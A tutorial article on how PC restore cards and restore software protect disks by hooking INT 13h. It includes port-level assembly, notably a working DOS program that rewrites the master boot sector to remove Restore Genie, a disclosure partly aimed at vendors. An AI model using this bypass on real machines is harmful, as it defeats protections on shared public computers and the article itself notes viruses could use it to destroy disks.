Restore cards and restore software are widely used in public settings such as school computer rooms and Internet cafés. These products (referred to below collectively as virtual restore technology) record everything written to the hard disk: whether you copy files onto the disk, move or delete them, or even format a partition, a restart puts everything back to the state it was in before those operations. Some vendors even add "prevents all computer viruses" to their advertising. Virtual restore technology really does protect a public computer room well. Is there a way through this protection? The answer is yes, and I will explain it step by step below.
First, the principle of virtual restore technology
The technique discussed in this article is the one commonly used by restore cards and restore software. Products from different vendors certainly differ in detail, but the principle is the same.
First, the restore card or restore software seizes control of the boot process: it saves the original master boot sector (head 0, cylinder 0, sector 1) to some other sector (which sector is used for the backup varies), and writes its own code into sector 1 of head 0, so that this code executes before the operating system, much like a boot-sector virus. Let us look at what the virtual restore code does before the operating system starts:
1. Save the INT 13h entry from the interrupt vector table;
2. Load its own replacement for the INT 13h code into memory and remember its entry address. This "load" is not an ordinary load but what we call making the code "resident". How to write a resident program is beyond the scope of this article; if you are not familiar with it, look up the relevant material, or find like-minded people to discuss it with at
Www.hackart.org or
Www.lsky.net;
3. Change the INT 13h entry in the interrupt vector table to the entry address of the resident program. After hooking the INT 13h entry, the virtual restore program usually also modifies some other interrupts; through the resident program it monitors the INT 13h entry in the interrupt vector table and, as soon as it finds the entry modified, changes it back immediately. This is there to keep the program from being cracked.
So you see, the code that replaces the BIOS routine is the key to virtual restore technology. What does this code actually do? The following is my own understanding:
1. Intercept all INT 13h accesses to head 0, cylinder 0, sector 1
These include both reads and writes: every operation on head 0, sector 1 is redirected to the sector where the virtual restore program keeps its backup. The purpose is to keep the virtual restore code from being damaged and from being read and cracked: even if you view the master boot sector with a sector editing tool, what you actually see is the backed-up master boot sector.
2. Intercept all hard disk write operations in INT 13h
This includes the ordinary INT 13h write operations for hard disks of 8 GB or less, the extended INT 13h write operations that address the disk by sector (LBA) address, and even the extended INT 13h write operations for hard disks on non-IDE interfaces.
How the interception is implemented is the real key to virtual restore technology. Under early DOS systems it was simply "do nothing": when the user wrote, the write was not actually performed. Current operating systems, however, must perform some necessary writes to the hard disk, such as writes to virtual memory. As everyone knows, virtual memory is really hard disk space, and forbidding the operating system to write to it is obviously unthinkable. Therefore most virtual restore vendors set aside some hard disk space to record the write operations made to the disk, and when the system restarts they discard that record. How exactly the writes are recorded I have never fully worked out; the "science" lies in the tradeoff between time and hard disk space, that is, how to record the hard disk writes using the least time and the least disk space. Friends who have looked into this are welcome to discuss it with me.
3. Back up the contents of ports 70h and 71h (the CMOS RAM), compare the current contents of ports 70h and 71h with the backup, prompt whether to restore when they differ, and use a password to decide whether a modification of the BIOS settings is legitimate.
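The mechanism described in steps 1 to 3 above (save the INT 13h vector, install a resident replacement, redirect sector 1 of head 0 to the backup copy, journal intercepted writes into spare space, discard the journal on restart, and guard the vector) can be modelled in a few dozen lines. The following C program is an added example written for this article; it is not any vendor's restore code, and the disk size, the backup sector number, the journal location and the byte 0xCC standing in for the restore program's boot code are all assumptions of the simulation.

```c
/* Toy model of the virtual-restore mechanism: hooked INT 13h, MBR backup,
 * write journal discarded on "restart", and the vector guard.
 * Added example, not any vendor's code; all numbers below are assumptions. */
#include <stdint.h>
#include <string.h>

#define SECTOR_SIZE   512
#define DISK_SECTORS  64
#define BACKUP_SECTOR 60   /* assumed: where the original MBR copy is parked */
#define JOURNAL_FIRST 40   /* assumed: spare sectors that record intercepted writes */
#define JOURNAL_SLOTS 16

typedef int (*int13_fn)(int write, int sector, uint8_t *buf);

static uint8_t  disk[DISK_SECTORS][SECTOR_SIZE];  /* the physical disk */
static int13_fn ivt[256];                         /* simulated interrupt vector table */
static int13_fn saved_int13;                      /* step 1: the original INT 13h entry */
static int      journal_map[DISK_SECTORS];        /* sector -> journal sector, -1 if none */
static int      journal_used;

/* The plain BIOS service: operates on the physical sector directly. */
static int bios_int13(int write, int sector, uint8_t *buf)
{
    if (sector < 0 || sector >= DISK_SECTORS) return 0;
    if (write) memcpy(disk[sector], buf, SECTOR_SIZE);
    else       memcpy(buf, disk[sector], SECTOR_SIZE);
    return 1;
}

/* Step 2: the resident replacement for INT 13h. */
static int resident_int13(int write, int sector, uint8_t *buf)
{
    /* Every access to head 0, sector 1 is diverted to the backup copy, so a
     * sector editor sees the original MBR rather than the restore code. */
    if (sector == 0) sector = BACKUP_SECTOR;
    if (write) {
        /* Writes never touch the sector in place; a copy goes to the journal. */
        if (journal_map[sector] < 0) {
            if (journal_used >= JOURNAL_SLOTS) return 0;   /* journal full: refuse */
            journal_map[sector] = JOURNAL_FIRST + journal_used++;
        }
        return saved_int13(1, journal_map[sector], buf);
    }
    /* Reads see the journaled copy while it exists, otherwise the real sector. */
    if (journal_map[sector] >= 0) sector = journal_map[sector];
    return saved_int13(0, sector, buf);
}

/* Boot-time installation: park the real MBR, plant the restore code in
 * sector 0, save the vector (step 1) and hook it (step 3). */
void install_restore(void)
{
    memcpy(disk[BACKUP_SECTOR], disk[0], SECTOR_SIZE);
    memset(disk[0], 0xCC, SECTOR_SIZE);   /* stand-in for the restore program's boot code */
    for (int i = 0; i < DISK_SECTORS; i++) journal_map[i] = -1;
    journal_used = 0;
    saved_int13  = ivt[0x13];
    ivt[0x13]    = resident_int13;
}

/* "Restart": the journal is discarded, so every intercepted write vanishes. */
void reboot_discard_journal(void)
{
    for (int i = 0; i < DISK_SECTORS; i++) journal_map[i] = -1;
    journal_used = 0;
}

/* The vector guard: re-assert the INT 13h entry if something changed it.
 * Returns 1 if a change was found and undone, 0 if the entry was intact. */
int guard_int13_vector(void)
{
    if (ivt[0x13] == resident_int13) return 0;
    ivt[0x13] = resident_int13;
    return 1;
}

/* Points the vector back at the plain BIOS service, then runs the guard. */
int vector_guard_demo(void)
{
    ivt[0x13] = bios_int13;
    return guard_int13_vector();
}

/* What a program gets when it issues INT 13h. */
int call_int13(int write, int sector, uint8_t *buf) { return ivt[0x13](write, sector, buf); }

/* Fresh disk: each sector filled with its own number, constructed MBR signature. */
void init_disk(void)
{
    for (int s = 0; s < DISK_SECTORS; s++) memset(disk[s], s, SECTOR_SIZE);
    disk[0][0x1FE] = 0x55;
    disk[0][0x1FF] = 0xAA;
    ivt[0x13] = bios_int13;
}

uint8_t physical_byte(int sector, int off) { return disk[sector][off]; }
```

Running the sequence install, write sector 5 through INT 13h, read it back, "restart", read again shows the write visible only until the restart, while the physical sector is never touched; a read of sector 0 through the hooked vector returns the backed-up MBR although the physical sector 0 now holds the restore code.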
Second, the interrupt mechanism of the PC
Interrupts provide the most basic interface between hardware and software: the programmer does not need to know the details of the hardware, only to call the system directly, and the corresponding function is carried out, which makes programming much more convenient. The mechanism works as follows. When an interrupt source raises an interrupt request, the CPU can decide whether to respond to it (when the CPU is doing more important work it may not respond). If the interrupt is allowed, the CPU finishes executing the current instruction, pushes the address of the next instruction, the contents of the registers and the flag bits onto the stack, and then jumps to the entry of the interrupt source's service routine to handle the interrupt. When handling is complete, the saved registers, flag bits and instruction pointer are restored, the CPU returns to the breakpoint, and execution continues with the next instruction.
To tell the interrupts apart, the PC system assigns each one an interrupt number N: INT 3h, for example, is the breakpoint interrupt and INT 10h is the video interrupt, and the one we discuss today is INT 13h, the disk read/write interrupt.
Describing the PC interrupt mechanism completely is far beyond this article; I am only touching on it here, and if you are not familiar with it, please look up some material or discuss it with me. What matters for us today is INT 13h, so let us look at what the BIOS interrupts give us and what they actually do. A BIOS interrupt is simply an interrupt routine provided by the BIOS of your machine; what lies behind it is a series of input and output operations on ports. Each port of the PC performs a specific function, so we can skip the routine the BIOS provides and use the IN/OUT instructions to operate those ports ourselves, achieving the same function as calling the BIOS interrupt. The precondition is that you must understand the ports in detail. Conversely, a great advantage of the PC interrupt system is that it lets programmers work without that detail; from this point of view an interrupt is a bit like the "encapsulation" we usually speak of. I am not sure this way of putting it is quite right, but an interrupt really does hide the details of the underlying system.
Third, the meaning of the hard disk read/write ports
The ports commonly used to operate the hard disk are 1F0H through 1F7H. Their meanings are as follows:
Port   Read/Write   Meaning
1F0H   read/write   data register: the data being read or written passes through this port
1F1H   read         error register
1F2H   read/write   number of sectors to read or write
1F3H   read/write   sector number to read or write
1F4H   read/write   low 8 bits of the cylinder number to read or write
1F5H   read/write   high 2 bits of the cylinder number to read or write (the upper 6 bits are always 0)
1F6H   read/write   drive number and head number to read or write:
                      bit 7     always 1
                      bit 6     always 0
                      bit 5     always 1
                      bit 4     0 = first hard disk, 1 = second hard disk
                      bits 3-0  head number to read or write
1F7H   read         status register (read after an operation):
                      bit 7     controller busy
                      bit 6     drive ready
                      bit 5     write fault
                      bit 4     seek complete
                      bit 3     1 when the sector buffer is ready for data transfer
                      bit 2     disk data was read correctly (corrected)
                      bit 1     index: set to 1 once per revolution of the disk
                      bit 0     the command ended because of an error
1F7H   write        command register, used to issue a command:
                      50H       format track
                      20H       read sector, retrying on error
                      21H       read sector without retry (read the sector directly, without verifying it)
                      22H       read long sector, retrying on error (on early hard disks a sector was not always 512 bytes but anywhere from 128 to 1024 bytes)
                      23H       read long sector without retry
                      30H       write sector, retrying on error
                      31H       write sector without retry
                      32H       write long sector, retrying on error
                      33H       write long sector without retry
Note: After reading this table you will of course notice that this way of reading and writing is based on addressing the hard disk by head, cylinder and sector. Even so, reading and writing hard disks larger than 8 GB is also done through ports 1F0H-1F7H. ^_^
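The table above is easiest to internalise as a decoder: given the five bytes a program writes to 1F2H-1F6H, recover the drive, head, cylinder and sector and turn them into a linear sector index, and turn a 1F7H status or command byte into names. The following C program is an added example for this article, not code from it; the disk geometry (heads and sectors per track) passed to chs_to_lba is an assumption, since the port values alone do not fix it.

```c
/* Decoder for the 1F2H-1F7H register values in the table above.
 * Added example; the geometry given to chs_to_lba is an assumption. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct {
    int drive;     /* 1F6H bit 4: 0 = first disk, 1 = second disk */
    int head;      /* 1F6H bits 3-0 */
    int cylinder;  /* 1F5H bits 1-0 (high) and 1F4H (low): a 10-bit value */
    int sector;    /* 1F3H, numbered from 1 */
    int count;     /* 1F2H */
} taskfile_t;

/* The three fixed bits of 1F6H must read 1, 0, 1 (bits 7, 6, 5). */
int drive_head_byte_valid(uint8_t p1f6) { return (p1f6 & 0xE0) == 0xA0; }

/* Decode what was written to ports 1F2H, 1F3H, 1F4H, 1F5H and 1F6H. */
taskfile_t decode_taskfile(uint8_t p1f2, uint8_t p1f3, uint8_t p1f4,
                           uint8_t p1f5, uint8_t p1f6)
{
    taskfile_t t;
    t.count    = p1f2;
    t.sector   = p1f3;
    t.cylinder = ((p1f5 & 0x03) << 8) | p1f4;   /* upper 6 bits of 1F5H are always 0 */
    t.drive    = (p1f6 >> 4) & 1;
    t.head     = p1f6 & 0x0F;
    return t;
}

/* Inverse: the bytes to write to 1F2H..1F6H (in that order) for a CHS location.
 * Returns 0 if the location cannot be expressed in the 10-bit/4-bit fields. */
int encode_taskfile(taskfile_t t, uint8_t out[5])
{
    if (t.cylinder < 0 || t.cylinder > 1023 || t.head < 0 || t.head > 15 ||
        t.sector < 1 || t.sector > 255 || t.count < 0 || t.count > 255) return 0;
    out[0] = (uint8_t)t.count;
    out[1] = (uint8_t)t.sector;
    out[2] = (uint8_t)(t.cylinder & 0xFF);
    out[3] = (uint8_t)(t.cylinder >> 8);
    out[4] = (uint8_t)(0xA0 | ((t.drive & 1) << 4) | (t.head & 0x0F));
    return 1;
}

/* Linear sector index for a geometry of `heads` heads and `spt` sectors per track;
 * -1 when the CHS values fall outside that geometry. */
long chs_to_lba(taskfile_t t, int heads, int spt)
{
    if (t.sector < 1 || t.sector > spt || t.head < 0 || t.head >= heads) return -1;
    return ((long)t.cylinder * heads + t.head) * spt + (t.sector - 1);
}

/* Names of the status bits, index = bit number. */
static const char *status_names[8] = {
    "error", "index", "data corrected", "buffer ready",
    "seek complete", "write fault", "drive ready", "busy"
};

/* Write the set bits of a 1F7H status byte as a comma-separated list (highest bit first);
 * returns how many bits were set. */
int describe_status(uint8_t status, char *out, size_t n)
{
    int set = 0;
    out[0] = '\0';
    for (int bit = 7; bit >= 0; bit--) {
        if (!(status & (1u << bit))) continue;
        if (set) strncat(out, ",", n - strlen(out) - 1);
        strncat(out, status_names[bit], n - strlen(out) - 1);
        set++;
    }
    return set;
}

/* Name of a byte written to the 1F7H command register. */
const char *command_name(uint8_t cmd)
{
    switch (cmd) {
    case 0x50: return "format track";
    case 0x20: return "read sector (retry)";
    case 0x21: return "read sector (no retry)";
    case 0x22: return "read long (retry)";
    case 0x23: return "read long (no retry)";
    case 0x30: return "write sector (retry)";
    case 0x31: return "write sector (no retry)";
    case 0x32: return "write long (retry)";
    case 0x33: return "write long (no retry)";
    default:   return "unknown";
    }
}

/* The register sequence used in the article's example: disk 0, head 0, cylinder 0, sector 1. */
int main(void)
{
    taskfile_t t = decode_taskfile(1, 1, 0, 0, 0xA0);
    char s[128];
    describe_status(0x58, s, sizeof s);
    printf("C/H/S %d/%d/%d count %d lba %ld status [%s] cmd %s\n", t.cylinder, t.head,
           t.sector, t.count, chs_to_lba(t, 16, 63), s, command_name(0x20));
    return 0;
}
```

With a 16-head, 63-sector geometry the example's register values decode to cylinder 0, head 0, sector 1, which is linear sector 0, the master boot sector; a status byte of 58H reads as drive ready, seek complete, buffer ready, which is exactly the state the polling loop in the next section waits for (bit 3 set).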
Fourth, an example of reading the hard disk through its input/output ports
Let us look at an example that reads the hard disk both through INT 13h and through the ports. The example spells out the ports used in a hard disk read operation, and the master boot sector obtained by reading through INT 13h is compared with the one obtained by reading through the input/output ports to confirm that the two operations are equivalent. The program fragment is as follows:
MOV DX, 1F6H            ; drive number and head number to read
MOV AL, 0A0H            ; disk 0, head 0
OUT DX, AL
MOV DX, 1F2H            ; number of sectors to read
MOV AL, 1               ; read one sector
OUT DX, AL
MOV DX, 1F3H            ; sector number to read
MOV AL, 1               ; sector number 1
OUT DX, AL
MOV DX, 1F4H            ; low 8 bits of the cylinder to read
MOV AL, 0               ; cylinder low 8 bits = 0
OUT DX, AL
MOV DX, 1F5H            ; high 2 bits of the cylinder to read
MOV AL, 0               ; cylinder high 2 bits = 0 (ports 1F4H and 1F5H together select cylinder 0)
OUT DX, AL
MOV DX, 1F7H            ; command port
MOV AL, 20H             ; read sector, with retry
OUT DX, AL
STILL_GOING:
IN AL, DX               ; read the status port
TEST AL, 8              ; is the sector buffer ready?
JZ STILL_GOING          ; if not, keep polling until it is
MOV CX, 512/2           ; loop count: 512 bytes = 256 words
MOV DI, OFFSET BUFFER   ; ES:DI -> destination buffer
MOV DX, 1F0H            ; data port, one word per transfer
REP INSW                ; transfer the sector into BUFFER
; --------
MOV AX, 201H            ; the following reads head 0, cylinder 0, sector 1 with INT 13h
MOV DX, 80H             ; drive 80H (first hard disk), head 0
MOV CX, 1               ; cylinder 0, sector 1
MOV BX, OFFSET BUFFER2  ; ES:BX -> destination buffer
INT 13H
MOV CX, 512             ; the following compares the data read by the two methods
MOV SI, OFFSET BUFFER
MOV DI, OFFSET BUFFER2
REPE CMPSB
JNE FAILURE
MOV AH, 9
MOV DX, OFFSET READMSG
INT 21H
JMP GOOD_EXIT
FAILURE:
MOV AH, 9
MOV DX, OFFSET FAILMSG
INT 21H
GOOD_EXIT:              ; the following ends the program
MOV AX, 4C00H           ; exit to DOS
INT 21H
READMSG DB 'The Buffers Match. Hard Disk Read Using Ports. $'
FAILMSG DB 'The Buffers Do Not Match. $'
BUFFER  DB 512 DUP ('V')
BUFFER2 DB 512 DUP ('L')
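The fragment above ends with a REPE CMPSB loop that only says whether the two 512-byte copies of the master boot sector match. For anyone checking a public machine's MBR against a known-good copy, it is more useful to know which region differs (boot code, partition table or signature), to decode the partition table, and to keep a baseline hash. The following C program is an added example written for this article, not code from it; the sample sector it builds is constructed, with NOP bytes standing in for boot code and one made-up partition entry.

```c
/* Parse and compare 512-byte master boot sectors. Added example, not the
 * article's code; make_sample_mbr builds a constructed sector for testing. */
#include <stdint.h>
#include <string.h>

#define SECTOR_SIZE 512
#define PTABLE_OFF  0x1BE   /* four 16-byte partition entries */
#define SIG_OFF     0x1FE   /* 55H AAH */

typedef struct { uint8_t bootable, type; uint32_t first_lba, sectors; } partition_t;

/* Bitmask of regions in which two copies differ. */
enum { MBR_SAME = 0, MBR_DIFF_CODE = 1, MBR_DIFF_PTABLE = 2, MBR_DIFF_SIG = 4 };

static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

int mbr_signature_ok(const uint8_t *mbr)
{
    return mbr[SIG_OFF] == 0x55 && mbr[SIG_OFF + 1] == 0xAA;
}

/* Decode the four partition entries into out[]; returns how many have a nonzero type. */
int mbr_partitions(const uint8_t *mbr, partition_t out[4])
{
    int used = 0;
    for (int i = 0; i < 4; i++) {
        const uint8_t *e = mbr + PTABLE_OFF + 16 * i;
        out[i].bootable  = e[0];           /* 80H marks the active partition */
        out[i].type      = e[4];
        out[i].first_lba = rd32(e + 8);
        out[i].sectors   = rd32(e + 12);
        if (out[i].type) used++;
    }
    return used;
}

/* Compare two reads of the sector and report which regions differ. */
int mbr_compare(const uint8_t *a, const uint8_t *b)
{
    int r = MBR_SAME;
    if (memcmp(a, b, PTABLE_OFF))                            r |= MBR_DIFF_CODE;
    if (memcmp(a + PTABLE_OFF, b + PTABLE_OFF, 64))          r |= MBR_DIFF_PTABLE;
    if (memcmp(a + SIG_OFF, b + SIG_OFF, 2))                 r |= MBR_DIFF_SIG;
    return r;
}

/* 32-bit FNV-1a over the whole sector: a compact baseline to store and recheck later. */
uint32_t mbr_fnv1a(const uint8_t *mbr)
{
    uint32_t h = 2166136261u;
    for (int i = 0; i < SECTOR_SIZE; i++) { h ^= mbr[i]; h *= 16777619u; }
    return h;
}

/* Constructed sample: NOP filler as boot code, one active type-07H partition, valid signature. */
void make_sample_mbr(uint8_t out[SECTOR_SIZE])
{
    memset(out, 0x90, PTABLE_OFF);
    memset(out + PTABLE_OFF, 0, SECTOR_SIZE - PTABLE_OFF);
    uint8_t *e = out + PTABLE_OFF;
    e[0] = 0x80;
    e[4] = 0x07;
    uint32_t lba = 63, len = 204800;       /* made-up start and length */
    for (int i = 0; i < 4; i++) {
        e[8 + i]  = (uint8_t)(lba >> (8 * i));
        e[12 + i] = (uint8_t)(len >> (8 * i));
    }
    out[SIG_OFF] = 0x55;
    out[SIG_OFF + 1] = 0xAA;
}
```

A mismatch confined to MBR_DIFF_CODE with an intact partition table is the signature of something having replaced only the boot code (which is what a boot-sector hook does), whereas a changed partition table or signature points at a damaged or foreign sector.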
Fifth, the code that can penetrate restore cards and restore software
If you have read the port meanings and studied the example above, you now have a fairly deep understanding of the hard disk ports. Good; now back to our topic. As you have probably guessed by now, the code that can penetrate restore cards or restore software is exactly the input/output port operation on the hard disk. From the principle we can already see why: the restore card intercepts the interrupt operation but cannot intercept port input/output, so port I/O can write to the hard disk, and of course port I/O can also read the part the virtual restore program hides, namely the head 0, sector 1 that the restore card or restore software shields. Having understood this principle, each reader will see it in their own way: someone who cracks virtual restore technology, a virus writer, or a designer of virtual restore technology will each draw different conclusions from it.
Here I stress that I do not endorse writing viruses, but a virus writer can use this principle to write code that destroys restore cards or restore software, so I want to remind users of virtual restore technology: do not assume that a restore card or restore software lets you relax. Know that there are viruses in the world that can penetrate virtual restore technology and destroy the hard disk. Imagine this principle applied to the CIH virus or to a hard-disk-killer virus; the consequences would be unbearable.
Now let us talk about how this code, which can penetrate virtual restore technology, can be used to crack restore software (such as Restore Genie). Below is the code I wrote to test cracking Restore Genie. The program assembled from this code must be run in a pure DOS environment. I used it to uninstall Restore Genie successfully.
.286
CODE SEGMENT
ASSUME CS:CODE, DS:CODE, ES:CODE
START:
; ----------------------------------------------------------
; the following code reads the master boot sector with INT 13h
MOV AX, 0201H
MOV DX, 0080H
MOV CX, 0001H
MOV BX, 7C00H
INT 13H
; ----------------------------------------------------------
; the following code writes the master boot sector through the I/O ports
MOV DX, 1F6H            ; drive number and head number to write
MOV AL, 0A0H            ; disk 0, head 0
OUT DX, AL
MOV DX, 1F2H            ; number of sectors to write
MOV AL, 1               ; write one sector
OUT DX, AL
MOV DX, 1F3H            ; sector number to write
MOV AL, 1               ; sector number 1
OUT DX, AL
MOV DX, 1F4H            ; low 8 bits of the cylinder to write
MOV AL, 0               ; cylinder low 8 bits = 0
OUT DX, AL
MOV DX, 1F5H            ; high 2 bits of the cylinder to write
MOV AL, 0               ; cylinder high 2 bits = 0
OUT DX, AL
MOV DX, 1F7H            ; command port
MOV AL, 30H             ; write sector, with retry
OUT DX, AL
OOGLE:
IN AL, DX               ; read the status port
TEST AL, 8              ; is the sector buffer ready?
JZ OOGLE
MOV CX, 512/2           ; loop count: 512 bytes = 256 words
MOV SI, 7C00H           ; DS:SI -> the sector read above
MOV DX, 1F0H            ; data port
REP OUTSW               ; send the data
; ----------------------------------------------------------
; exit the program
MOV AH, 4CH
INT 21H
CODE ENDS
END START
The above program is very simple, and is explained as follows:
1. First read the original master boot sector with INT 13h. Although this is a read of head 0, cylinder 0, sector 1, because Restore Genie is installed what is actually read is the sector holding its backup of the original master boot sector;
2. Write that original master boot sector into the real master boot sector through port I/O. In other words, this completely removes Restore Genie; after a restart you will find that Restore Genie is gone.
I also wrote a Restore Genie uninstall program for Win98/NT/XP, which everyone can download from
Www.lsky.net. But someone got there a step ahead of me with an Internet café MBR-clearing program found on the Internet. I tried it and it works. I have not analysed that program carefully, but I am sure its principle is similar. It is well written, but I think there is something to improve: the MBR on my hard disk is one I wrote myself to implement multi-boot, and after I ran that MBR program my multi-boot code was gone. So I think that program could change its core code into something like mine: with Restore Genie installed, write the MBR from before Restore Genie back into the master boot sector; on a hard disk without Restore Genie this just writes the master boot sector back onto itself, so there is no danger.
Cracking a restore card with the method above is not necessarily possible, because a restore card is hardware after all: it can execute before the hard disk boots, so even if you write the hard disk's master boot sector back, the restore card can still write itself back again. Still, when cracking a restore card you can use the principle in this article to read the restore card's real code out of the hard disk's master boot sector, and some restore cards even keep their password in this sector. For the manufacturers of restore cards and restore software, how to make their own restore card or restore software safer may be a problem that needs thought. I sincerely hope that restore cards and restore software will also block hard disk I/O port operations while intercepting INT 13h.
When I installed Restore Genie I saw an option named "Prevent Hard Disk I/O Destruction", and I thought Restore Genie had done something in this area, that is, protected the hard disk by intercepting I/O port operations. Unfortunately I was wrong: even with this option selected I could still write to the hard disk through the input/output ports. For anyone who has mastered this technique, such a restore card or restore software is protection in name only. So I believe restore cards and restore software must not only intercept all hard disk write operations and the reads and writes of the master boot sector, but must also intercept the port operations that read and write the hard disk. Only then can virtual restore technology make hard disk destruction, or cracking of the virtual restore technology itself, through hard disk read/write port operations impossible.